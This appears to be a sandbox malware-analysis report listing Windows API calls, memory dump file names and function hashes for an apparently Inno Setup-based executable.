• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Prop$Window
• String ID:
• API String ID: 3363284559-0
• Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
• Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
• Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
• Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 0041EE64
• IsWindowEnabled.USER32(?), ref: 0041EE6E
• EnableWindow.USER32(?,00000000), ref: 0041EE94
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$EnableEnabledVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3234591441-0
                                                                                                                                                                                                                                  • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                                                                                                                                  • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalHandle.KERNEL32 ref: 00406289
                                                                                                                                                                                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 00406290
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406295
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$FreeHandleWire
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 318822183-0
                                                                                                                                                                                                                                  • Opcode ID: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                                                                                                                                  • Instruction ID: 0bd3332245bc481727117fba3a6c85ee4c387b864c86d5f24a339be909c9c9d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fb441d58b367f32f482df158d6c8a90520777f868e58a6b13673b60c2f5b21c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FA001C4800A01A9DC0432B2080B93B200CD84122C390096B3408BA182887C88401A3D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ActiveWindow
                                                                                                                                                                                                                                  • String ID: PrepareToInstall
                                                                                                                                                                                                                                  • API String ID: 2558294473-1101760603
                                                                                                                                                                                                                                  • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                                                                                                                                  • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: /:*?"<>|
                                                                                                                                                                                                                                  • API String ID: 0-4078764451
                                                                                                                                                                                                                                  • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                                                                                                                                  • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ActiveWindow
                                                                                                                                                                                                                                  • String ID: InitializeWizard
                                                                                                                                                                                                                                  • API String ID: 2558294473-2356795471
                                                                                                                                                                                                                                  • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                                                                                                                                  • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
Strings
• Inno Setup: Setup Version, xrefs: 0046EE65
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
  • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
  • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
• SendNotifyMessageA.USER32(000104B0,00000496,00002711,-00000001), ref: 0047E6BA
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: EnumFontsMessageNotifyReleaseSend
• String ID:
• API String ID: 2649214853-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
  • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ByteCharMetricsMultiSystemWide
• String ID: /G
• API String ID: 224039744-2088674125
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                                                                                    • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 296031713-0
                                                                                                                                                                                                                                  • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                                                                                                                                  • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnum
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2818636725-0
                                                                                                                                                                                                                                  • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                                                                                                                  • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2919029540-0
                                                                                                                                                                                                                                  • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                                                                                                                  • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                                                                                                                                                  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4097029671-0
                                                                                                                                                                                                                                  • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                                                                                                                  • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                                                                                                                  • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Thread$CurrentEnumWindows
• String ID:
• API String ID: 2396873506-0
• Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
• Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
• GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
